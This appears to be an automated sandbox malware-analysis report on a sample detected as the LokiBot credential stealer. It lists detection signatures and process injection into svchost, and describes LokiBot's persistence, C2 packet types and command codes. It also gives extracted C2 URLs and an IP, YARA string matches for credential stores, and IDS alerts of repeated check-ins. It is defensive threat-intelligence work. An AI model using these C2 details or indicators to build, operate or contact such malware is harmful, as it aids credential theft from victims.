Edit tour

Windows Analysis Report
PRI_VTK250419A.exe

Overview

General Information

Sample name:	PRI_VTK250419A.exe
Analysis ID:	1623793
MD5:	d45ab46d87bb599ccc62569c10d2d323
SHA1:	d7010744a6dc830a79406b04ce281c7b60cc531a
SHA256:	f29f7c7516de91fc3d8e1d6c23590cc5c73a9123176cd6b742c8d5c23d5da9f5
Tags:	exeLokiuser-threatcat_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Lokibot

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PRI_VTK250419A.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\PRI_VTK250419A.exe" MD5: D45AB46D87BB599CCC62569C10D2D323)

svchost.exe (PID: 3868 cmdline: "C:\Users\user\Desktop\PRI_VTK250419A.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000002.00000002.3294418603.0000000003021000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Process Memory Space: PRI_VTK250419A.exe PID: 7140	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: PRI_VTK250419A.exe PID: 7140	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: PRI_VTK250419A.exe PID: 7140	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x882e8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: svchost.exe PID: 3868	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 3868	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: svchost.exe PID: 3868	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 3868	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1a4a7:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.PRI_VTK250419A.exe.1120000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.PRI_VTK250419A.exe.1120000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.PRI_VTK250419A.exe.1120000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.PRI_VTK250419A.exe.1120000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.PRI_VTK250419A.exe.1120000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.svchost.exe.400000.1.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.svchost.exe.400000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.svchost.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.400000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.svchost.exe.400000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.svchost.exe.400000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.svchost.exe.400000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.svchost.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.svchost.exe.400000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.2.svchost.exe.400000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.svchost.exe.400000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PRI_VTK250419A.exe", CommandLine: "C:\Users\user\Desktop\PRI_VTK250419A.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PRI_VTK250419A.exe", ParentImage: C:\Users\user\Desktop\PRI_VTK250419A.exe, ParentProcessId: 7140, ParentProcessName: PRI_VTK250419A.exe, ProcessCommandLine: "C:\Users\user\Desktop\PRI_VTK250419A.exe", ProcessId: 3868, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\PRI_VTK250419A.exe", CommandLine: "C:\Users\user\Desktop\PRI_VTK250419A.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PRI_VTK250419A.exe", ParentImage: C:\Users\user\Desktop\PRI_VTK250419A.exe, ParentProcessId: 7140, ParentProcessName: PRI_VTK250419A.exe, ProcessCommandLine: "C:\Users\user\Desktop\PRI_VTK250419A.exe", ProcessId: 3868, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T15:37:04.607899+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49704	104.21.80.1	80	TCP
2025-02-25T15:37:06.604035+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49705	104.21.80.1	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T15:37:03.839421+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49704	104.21.80.1	80	TCP
2025-02-25T15:37:05.884395+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49705	104.21.80.1	80	TCP
2025-02-25T15:37:06.678043+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49706	104.21.80.1	80	TCP
2025-02-25T15:37:08.646573+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49707	104.21.80.1	80	TCP
2025-02-25T15:37:10.582091+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49708	104.21.80.1	80	TCP
2025-02-25T15:37:12.501734+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.80.1	80	TCP
2025-02-25T15:37:14.423788+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49710	104.21.80.1	80	TCP
2025-02-25T15:37:16.361092+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49711	104.21.80.1	80	TCP
2025-02-25T15:37:18.470114+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49717	104.21.80.1	80	TCP
2025-02-25T15:37:20.449634+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49725	104.21.80.1	80	TCP
2025-02-25T15:37:22.516317+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49741	104.21.80.1	80	TCP
2025-02-25T15:37:24.442832+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49752	104.21.80.1	80	TCP
2025-02-25T15:37:26.362703+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49764	104.21.80.1	80	TCP
2025-02-25T15:37:28.324980+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49779	104.21.80.1	80	TCP
2025-02-25T15:37:30.282636+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49792	104.21.80.1	80	TCP
2025-02-25T15:37:32.262945+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49804	104.21.80.1	80	TCP
2025-02-25T15:37:34.171066+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49819	104.21.80.1	80	TCP
2025-02-25T15:37:36.096465+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49832	104.21.80.1	80	TCP
2025-02-25T15:37:38.017545+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49846	104.21.80.1	80	TCP
2025-02-25T15:37:39.994212+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49860	104.21.80.1	80	TCP
2025-02-25T15:37:41.899055+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49873	104.21.80.1	80	TCP
2025-02-25T15:37:43.834928+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49886	104.21.80.1	80	TCP
2025-02-25T15:37:45.768346+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49900	104.21.80.1	80	TCP
2025-02-25T15:37:47.703387+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49912	104.21.80.1	80	TCP
2025-02-25T15:37:49.658365+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49927	104.21.80.1	80	TCP
2025-02-25T15:37:51.470383+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49938	104.21.80.1	80	TCP
2025-02-25T15:37:53.252481+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49951	104.21.80.1	80	TCP
2025-02-25T15:37:55.190339+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49966	104.21.80.1	80	TCP
2025-02-25T15:37:57.146055+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49981	104.21.80.1	80	TCP
2025-02-25T15:37:59.054566+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49993	104.21.80.1	80	TCP
2025-02-25T15:38:00.923982+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50004	104.21.80.1	80	TCP
2025-02-25T15:38:03.129955+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50007	104.21.80.1	80	TCP
2025-02-25T15:38:05.018828+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50008	104.21.80.1	80	TCP
2025-02-25T15:38:06.937484+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50009	104.21.80.1	80	TCP
2025-02-25T15:38:08.844857+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50010	104.21.80.1	80	TCP
2025-02-25T15:38:10.801171+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50011	104.21.80.1	80	TCP
2025-02-25T15:38:12.738105+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50012	104.21.80.1	80	TCP
2025-02-25T15:38:14.640871+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50013	104.21.80.1	80	TCP
2025-02-25T15:38:16.455340+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50014	104.21.80.1	80	TCP
2025-02-25T15:38:18.421744+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50015	104.21.80.1	80	TCP
2025-02-25T15:38:20.374351+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50016	104.21.80.1	80	TCP
2025-02-25T15:38:22.285474+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50017	104.21.80.1	80	TCP
2025-02-25T15:38:24.210909+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50018	104.21.80.1	80	TCP
2025-02-25T15:38:26.128727+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50019	104.21.80.1	80	TCP
2025-02-25T15:38:27.930674+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50020	104.21.80.1	80	TCP
2025-02-25T15:38:30.192910+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50021	104.21.80.1	80	TCP
2025-02-25T15:38:32.070314+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50022	104.21.80.1	80	TCP
2025-02-25T15:38:34.049302+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50023	104.21.80.1	80	TCP
2025-02-25T15:38:35.962917+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50024	104.21.80.1	80	TCP
2025-02-25T15:38:37.927242+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50025	104.21.80.1	80	TCP
2025-02-25T15:38:39.840894+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50026	104.21.80.1	80	TCP
2025-02-25T15:38:41.806917+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50027	104.21.80.1	80	TCP
2025-02-25T15:38:43.756691+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50028	104.21.80.1	80	TCP
2025-02-25T15:38:45.617770+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50029	104.21.80.1	80	TCP
2025-02-25T15:38:47.543151+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50030	104.21.80.1	80	TCP
2025-02-25T15:38:49.503055+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50031	104.21.80.1	80	TCP
2025-02-25T15:38:51.426845+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50032	104.21.80.1	80	TCP
2025-02-25T15:38:53.402371+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50033	104.21.80.1	80	TCP
2025-02-25T15:38:55.331665+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50034	104.21.80.1	80	TCP
2025-02-25T15:38:57.256281+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50035	104.21.80.1	80	TCP
2025-02-25T15:38:59.246009+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50036	104.21.80.1	80	TCP
